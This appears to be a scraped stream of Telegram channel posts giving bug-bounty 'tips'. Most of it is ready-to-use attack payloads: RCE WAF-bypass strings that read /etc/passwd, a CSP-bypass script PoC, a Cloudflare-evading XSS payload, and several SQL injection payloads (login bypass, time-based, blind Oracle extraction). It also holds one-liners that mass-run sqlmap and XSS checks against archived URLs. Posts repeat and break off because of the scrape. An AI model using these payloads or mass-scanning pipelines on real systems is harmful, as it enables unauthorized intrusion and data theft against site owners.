Not only crawling but you can do Subdomain Enumeration using Wayback.
——————
0Day.Today
@LearnExploit
@Tech_Army
curl --insecure --silent "http://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty ——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass Captcha (Google reCAPTCHA)
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
RCE WAF Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload Injector:
➕ Debinject:
😸 GitHub
➕ Pixload:
😸 GitHub
➕ Gospider:
😸 GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/Tech_Army
#Injection #Hacking_Tool #BugBounty
BugCod3
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
You can bypass CSP on any website that allows http://microsoft.com in a script-src
PoC:
octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year : octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.
Payload
#VPD #BugBounty #security
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
Payload
' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay#VPD #BugBounty #security
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
cloudflare WAF bypass XSS
any payload they blocked by cloudflare
this payload working
#Cloudflare #Bugbounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
any payload they blocked by cloudflare
this payload working
"><img src=x onerrora=confirm() onerror=confirm(1)>#Cloudflare #Bugbounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
Injected in request like this
#BugBounty #Tips #SQL
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE-1 OR 6=6 AND 0-0=> TRUEInjected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0#BugBounty #Tips #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
If you discover an oracle web app, you can use this payload
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
One line for subdomain
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
$(subfinder -d http://tesla.com| dnsx |httpx); do katana -u "$subdomain" -d 5 -jc -jsl -aff -kf all -mrs 5242880 -timeout 15 -retry 3 -s breadth-first -iqp -cs "$subdomain" -f url -sf url -rl 200 -p 20 -dr -nc -H -silent -fdc 'status_code == 404' ;done#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
bbscope
Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!
Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.
Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation:
Make sure you've a recent version of the Go compiler installed on your system. Then just run:
Usage:
Github
⬇️ Download
🔓
#GO #Grabber #Scope #BugBounty
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!
Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.
Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation:
Make sure you've a recent version of the Go compiler installed on your system. Then just run:
GO111MODULE=on go install github.com/sw33tLie/bbscope@latest
Usage:
bbscope (h1|bc|it|ywh|immunefi) -t <YOUR_TOKEN> <other-flags>
Github
⬇️ Download
🔓
LearnExploit#GO #Grabber #Scope #BugBounty
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Scan for [CVE-2023-49785] ChatGPT-Next-Web - SSRF/XSS
⬇️ Download
🔓
#BugBounty #Nuclei #Templates
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⬇️ Download
🔓
BugCod3#BugBounty #Nuclei #Templates
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
SQL Injection
After this, I used ghauri to extract the database It was successful
#SQL #Injection #ghauri #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
After this, I used ghauri to extract the database It was successful
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--#SQL #Injection #ghauri #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
SQLMap from Waybackurls
#Sqlmap #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"#Sqlmap #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
xss oneliner command
⬇️ Download ( Tools )
🔒
🔒
#XSS #BugBounty #Oneliner #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vulnBugCod3 ( ZIP )LearnExploit ( BOT )#XSS #BugBounty #Oneliner #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
Sql Injection
Payload :
Parameter:
#BugBounty #Tips #sql_injection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload :
-10'XOR(if(now()=sysdate(),sleep(20),0))XOR'ZParameter:
cart/-10+payload#BugBounty #Tips #sql_injection
Please open Telegram to view this post
VIEW IN TELEGRAM